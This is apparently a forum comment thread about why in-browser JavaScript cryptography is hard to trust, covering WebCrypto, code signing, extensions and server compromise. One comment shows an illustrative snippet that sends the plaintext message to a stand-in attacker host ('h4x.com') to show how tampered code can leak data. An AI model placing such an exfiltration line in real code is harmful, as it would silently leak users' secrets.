I think it's obvious to everyone that code coming directly from the server can not be trusted completely by the end user. The only solution that might work is signed browser extensions. I really would have liked to learn about more considerations when taking this route.
However code coming from the server can be verified, so you can know if the cryto.js delivered to you was modified from a known good version. You can audit a particular version and say, "this works correctly", and then look at changes over time.
For instance you can have a greasemonkey script that tells you when the crypto code is different from last time.
The best solution realistically would be SSL plus encrypting data first in the browser (separately encrypt the data and the transmission of it).
If you're going to have a script/extension checking that the code you download is the code you want, then just package everything as an extension and be done with it. If you're signing with your private key and verifying with your public, you're going to have to keep your private key on separate machines from your app servers (and hopefully on another network entirely) otherwise Hacky McMalware can just publish a version of crypto.js (using your private key) that sends data to a remote server in plaintext. With all this signing going on, you no longer have automatic deployment (you have to re-sign on every change) and the benefits of serving a webapp+extension (with complexity of signing/verifying) start to look similar to just having an extension that packages everything and you sign on each change anyway.
Best solution is not to try to build any kind of webapp that touches client-side crypto. If you have to, package everything in an extension since you'll need one to distribute your public key anyway.
This post is talking about the W3C WebCrypto API, which allows browsers to expose native versions of cryptographic primitives directly into the browser. This mitigates an entire class of attacks that things like "crypto.js" can't, like cache timing attacks, for example. Providing a native JavaScript API for cryptography which is baked into the browser solves a lot of problems around both security and performance. This is also a much better solution than a GreaseMonkey script. The W3C has been doing their homework.
BUT...
That said, this entire post is about why even when the fundamentals of exposing cryptographic primitives into the browser are solved, the browser is still a bad platform for cryptography applications, particularly when the user doesn't want to trust the server.
sorry, this is only somewhat related. but i am really ignorant. this is a genuine question that i have for quite some time now.
when i download security relevant software, the website usually gives me a hash/signature of the download file, so i can verify afterwards whether the data i downloaded really is the file i want or whether it has been tampered with.
but in case an attacker switches the downloaded file for a malignant one, why should s/he be so stupid and not also switch the hash/signature on the website? i am positive i am missing something, as really smart people [0] are doing this, but i do not get it. thanks in advance.
The signature is generated using public key cryptography [1] meaning, to generate a valid signature, you have to have the private key.
Because the signature only has to be generated when a new version of the file is released, you can use the most bothersome (and effective) manual methods of security, like keeping the private key on an air gapped [2] computer.
So if an attacker manages to switch the downloaded file for a malicious one, they may still not have got access to the private key used for release signing.
Of course, the attacker could still remove all links to the signature file and all mention of it in the public documentation, so downloaders wouldn't know there was a signature to check. So it's better if the site isn't compromised in the first place.
So this will also probably be another seemingly clueless question, but after reading up on air gapped computers, how would that help with the new hash?
You're running into a basic bootstrapping problem: the person providing the file wants you to be able to check that the file is authentic, but you have no cryptographic mechanism to verify that.
What they're assuming is that someone who has compromised the download servers won't also compromise the rest of the web site. That's certainly a possibility though.
An attacker who compromises both could trick you into downloading compromised software, even though you're checking the hashes from the web site. There are also multiple ways they could pull this off.
For what it's work, much of The Update Framework work which I referenced in the blog post has come out of Thandy, the Tor updater. The model Tor is providing here is often referred to as TOFU, or "Trust On First Use", i.e. once you have received a good copy of Thandy, you will continue to receive uncompromised versions of the software.
add: so thanks to bascule and michaelt i now realise that the idea is basically increasing the cost to the attacker. by serving the signature and the file from different servers, the attacker has to compromise both servers. by signing with a private key and publicising the public key, the attacker has to compromise either the private key storage or all the public key storages. thanks a lot.
a huge issue i think in SSL is allowing 3rd party anything to be served from a different domain via https, there should be warnings and automatic blocks about this for the user and i don't know why there aren't.
i wonder if having a public, open-source cdn specifically for crypto libs with known sha256 signatures and having a standard way to "require" them in the html standard that differs from how regular scripts can be included/injected now. or even include them in browsers so they're auto-updated by the vendors or some central trusted authority.
That's all fine and well, but there's no standard way to implement encryption using the now-standard crypto libs. In other words an attacker can still change your code from
var ciphertext = StandardCrypto.aes(my_key, my_message);
to
// disable crypto
var ciphertext = my_message;
// or send plaintext to h4x.com
send_jsonp('http://h4x.com/collect?msg='+my_message);
var ciphertext = StandardCrypto.aes(my_key, my_message);
Standard crypto libs won't do you any good if you aren't actually calling them.
sure, if the server is compromised there's really not much that will save anyone. but the user must necessarily trust the server at least with the data they intend to encrypt. for authentication they can trust some third party like oauth or persona/browser-id.
> but the user must necessarily trust the server at least with the data they intend to encrypt
not true. if i distribute an app that encrypts user data (based on a username/password-derived key), stores it on a server, and lets them access it anywhere (from the app), the server can be stupid as a bag of rocks and know nothing about the data, and more importantly, require absolutely no trust from the client because the client encrypts everything via code it owns. at this point, the user only needs to trust the app and the platform it runs on, because the server has absolutely nothing to do with the encryption.
if the sever does nothing but storage, you're right. i was talking more about something like SaaS and encrypting in transport, such as passing CC info or other sensitive data that the sever must know to pass through to gov't backends, payment processors or other apis.
you can't say, for example, that Lavabit could still provide a service without knowing the recipient's decrypted email address.
In those scenarios, client side crypto isn't even applicable to begin with. If the service requires trusting the server with sensitive information, then the best we can hope for is to secure the transport of the data, which is done with https. Client side crypto only comes into plays with apps where you don't want to trust the server with any sensitive data.
The big problem with most (all?) in-browser cryptography is you still need to trust the server. If you have to trust the server what is the value of doing crypto on the client side. You may as well do crypto on the server side and communicate between the server and the client using SSL.
You pretty much have the same issue with any desktop software - you have to trust the authors and the server that gives you the download files (or the server(s) that give you checksums and public keys to verify the download).
Doing in-browser crypto requires less trust than server-side crypto. With in-browser crypto, the server would have to do an active attack and serve malicious scripts, which could be detected. When everything happens in the server all the time, it would be a passive attack that doesn't require any client-side modification and could easily go undetected.
Also, with open-source websites, people could audit the source code and ensure it works as advertised. Combined with a browser extension that verifies the source code from the website matches the code on the public code repository, this could make it much easier to trust websites to do in-browser crypto right.
I have a problem that is best solved by encrypting data in the browser - because the server should not be trusted with seeing the information in the clear.
This is much like the exception the OP mentions at LivingSocial. Can anyone weigh in on whether that's safe?
Safe(r) than just sending it in the clear so the server can read it, probably. However, if your server gets compromised, the JS code doing the crypto can easily be replaced to just return the results plaintext...in which case you're still doing SSL, so good job, but the CC#s are vulnerable to whomever wishes to sniff them on the server, which is pretty much how most online systems work anyway.
Couldn't hurt to use asymmetric encryption using the provider's public key, but just beware that without packaging/signing the crypto code, it's a tossup whether or not it's actually there.
Edit: if it's absolutely imperative that the server not be able to read the message, then not packaging all the code is unsafe. However, if the server not being able to read the message is nice to have but non-essential, then by all means, run your code in a webapp.
Thanks. I'd use a browser extension, and also constrain what gets sent to the server.
If the server was really compromised, it could just copy the CC# into another field in the form (so it gets sent twice, encrypted and unencrypted) - and the server would get the data without having to change the JS. Integrity checks would not turn anything up. A properly paranoid browser extension should have a specified format for sending a form, so that no extra information is leaked.
In my case it's bids rather than CC#s, though the same pattern holds of encrypting with the tender creator's public key.
If you were to install some packages on a system, would you install unsigned ones that are allowed to modify every other package, altering how other programs work, without confirmation? That's effectively the state of browser security right now.
We must stop living in this fantasy playground of pretending no security in the browser is acceptable, because important things like passwords, PIN numbers and credit card numbers pass through it.
An ability to sign (not hashes, signed) and verify JS, CSS and HTML would be a start. Once verified, a security policy* is applied further sandboxing an app so it doesn't go to shit with modifications or inappropriate introspections by injected or malicious code (while usually retaining normal things like the browser and plugins). Also reasonable limits to mark objects and parts of the DOM as only available to certain objects, not Orwellian mandates to throw webdev into chaos.
This is something that would take a great deal of coordination with reluctant vendors that see change as cost, but it would be the biggest win for browser security.
* Something a bazillion times easier to use than SELinux.
Sensible post. Yes, doing crypto in the browser is generally harder due to not having direct access to OpenSSL and due to XSS and many other javascript-related vulnerabilities. But if you cover your ass, don't eval code willy-nilly, and package everything into a browser extension (not just your public key or 90% of your JS, but everything) you can mitigate a lot of potential threats. Also, don't try to reinvent SSL. If you do your own crypto in the browser, it should be for peer to peer, not peer to server.
With something like Firefox, you're kind of screwed. For instance, if I open firebug while using my Turtl extension, I can read the contents of memory right there...there's no real separation/sandboxing between extensions. If one extension can read the contents of another, you've got problems. Chrome does this better.
The best way is to package everything into a separate (os-level) app.
>The best way is to package everything into a separate (os-level) app.
I agree with this on the premise of threats like XSS, however there is a human aspect of security which might be overlooked. The problem with apps is that everything that is a website today will become a native app tomorrow. App developers might claim that their app is more secure than using a website to do the same thing, because of the included native crypto implementation. Users might then associate any native app with having greater security than a website accessed through a browser (which may not necessarily be true.) Users might become further desensitized to installing everything from the internet as an app.
Why is this a problem? Websites normally cannot access things like your personal files, without you explicitly choosing a file from your computer using a file dialog, whereas if you run a native app with your user credentials, it is immediately able to access any file that you have permission to access, without necessarily informing you.
Perhaps OS-level security and sandboxing is going to have to improve for this sort of thing to be a good option.
I can see this side of it as well. I tend to come from the camp that if you don't release your code as open-source, you can't really call yourself secure. If you're 100% open-source, distributing a desktop/mobile app will have enough transparency to determine "is it going to steal my CC numbers?"
There's also a barrier to entry to get a user to install anything. Mobile is different, but in the desktop world, if I told my users to download the "CNN desktop app!" they'd roll their eyes because why would anyone install some trashy malware-ridden program when they can just look at the website, for free, and as you put it, much safer? From my perspective, the only reason to distribute a "secure" desktop app version of your webapp is if you don't have a webapp to begin with because it's not secure to do so. So the desktop app would be an open-source complement to the browser extensions your secure app uses.
The products where users seem to preferentially install native apps are services like Dropbox, or video games, where there is value added by not using the "website version." Something that would be very revealing is to investigate how secure these kinds of apps are today. I find it unlikely that in the near future, native app security practices will change very much.
With Bitrated, I'm trying to resolve the main issue he's raising by creating a browser extension that verifies all the content served from the webserver is properly digitally signed and that it matches the source code repository on GitHub.
Anyone interested in working on a man-in-the-middle resistant version of browser/Javascript encryption? I have the basic idea described here: http://www.research.rutgers.edu/~ashwink/ajaxcrypt/index.htm...
I have working code, but it needs some refactoring.
I have this feeling that one day we'll look back in a sort of amused horror that people used to let their browsers run code they downloaded from unknown servers. But I'm not really sure what we'll be doing instead of that.
IMO, this is really important and system application security is not in much better shape than web browser security; you still need to trust a huge number of sources and these sources have known security issues regularly. For that matter, it is probably not that difficult to insert known vulnerable code into some widely used application without it being detected. While there will always need to be some trusted code, it is possible to limit the amount of trusted code and the number of sources that code comes from given better OS security models.
Since hardware and firmware can also be subverted, IMO a new security model should also be able to track and limit what network traffic is intended so that the network traffic actually generated can be (potentially) verified by additional machines on the network and/or by other verifier virtual machines on the same system.
Could Dart or other languages in the browser solve this problem of not being able to do crypto properly in the browser, or is this a more fundamental problem of having crypto inside a browser in the first place?
The fundamental issue is that the code needs be audited and signed offline so it can't be changed. Unsigned code should not be run. This makes releases harder (no push on commit).
It's not language-specific. App stores already work this way (including the Chrome web store), so a deployment mechanism is there; it's just not used as often as it should be.
It's funny, back in the day we debated ActiveX (code signing) versus sandboxes (Java and JavaScript) and the real answer is that you should have both (as Android does).
But code signing isn't magic either. You still need someone to do the auditing, and users to be careful about what they run. Since users are so trusting, I'm not sure that app stores in practice are any more secure.
Code signing turned out to be very successful for protecting against VBA macro viruses, though I would consider the use of MD5 for doing it flawed nowadays. Office 2007 and later ended up defaulting to a different solution however, and days ago I received an email in my inbox with an attachment that claims hidden content and ask the user to enable macros. It is not signed, and guess what the macro does?
How does this differ from HTTPS? Since we're dealing with World Wide Web, it can't be that you would have to install the public key of every site that you visit to get signed versions of the code – it would make browsing infeasible.
It just boils down to the CA based system that is already employed by HTTPS. You must of course trust the other party and their systems, but that's the exact same with code signing. To identify the other party, code signing uses a pre-shared secret (e.g. your OS comes pre-installed with their public key). In HTTPS you identify the other party by them possessing the right certificate, that's signed by a trusted intermediary. There's no really better way to do it, bar quantum crypto and HTTPS+DNSSEC, which is sadly not widely supported.
The difference is that if a server running HTTPS is hacked, the attacker can modify the JavaScript at will. With an app that's signed offline, this isn't possible; you could even redistribute it on an untrusted mirror.
Also, in theory, an independent auditor could rebuild the app from source and verify that the bits match, and do an independent audit of the source. So signed apps are more verifiable.
The trusted base for a signed app is (browser + app + app signer), not (browser + app + server), where the server might be a virtual machine in the cloud and you need to trust the virtual machine host provider too.
This doesn't matter most of the time because you have to trust the server anyway, but in the case of someone wanting to encrypt something on the client that cannot be decrypted on the server, it does matter. Encrypting on the client is mostly pointless unless the client code is independent of the server, which requires it to be independently signed.
There is still a cert chain of course, but it's a different one where the developer's private key doesn't get uploaded to the server.
Signed apps are fundamentally not how the web works. The argument here is that the web is basically broken for client-side encryption and the app store model is better for things like secure email or a bitcoin wallet.
But since most app store apps aren't open source and the open source ones aren't independently audited in practice, it's not clear it's a practical difference.
It's a fundamental problem with browser crypto. The attack surface of a crypto routine running in a webpage is really large. There are a lot of places where information could leak in or out, such as timing attacks. If an XSS attack on a webpage succeeds, then a large number of different attack opportunities could exist on browser crypto loaded from that page. Users might also have browser extensions which have the ability to inject into or steal from the web page. The number of things to worry about inside a browser is just way too high to really even consider using it to secure anything. The crypto would have to be built in to the browser at the very least.
I think the OP makes some good points, but I dislike when people are put off of working on their own crypto. Can crypto be difficult to implement? Certainly. Is it impossible? No. The OP makes it sound like properly implementing and authenticating a block cipher is way too difficult for the average programmer, when it is really rather trivial.
For those who can't read sarcasm over the internet, he's kidding. Go ahead, implement ECB mode, what could go wrong, LOL. I've also got a really nice "special" RNG for you too, although its really slow it is NSA approved.
If you only need security theater just stick to ROT-13.
As a tiny little sub area of computational activity, writing crypto is total sorcerers apprentice territory.
The problem is not that the specific tasks are too heady for most programmers, per se, but that it is easy to introduce a weakness into the system and almost impossible for most programmers to know when they have done so. Implementing an algorithm correctly is one thing; ensuring that your whole system does nothing to undermine the security you hope to get from that algorithm (even through side channels) is a lot iffier.
Remember, people with years of training and experience in the field have had their work defeated time and again. Do you really feel certain Joe Coder will make fewer mistakes than they did?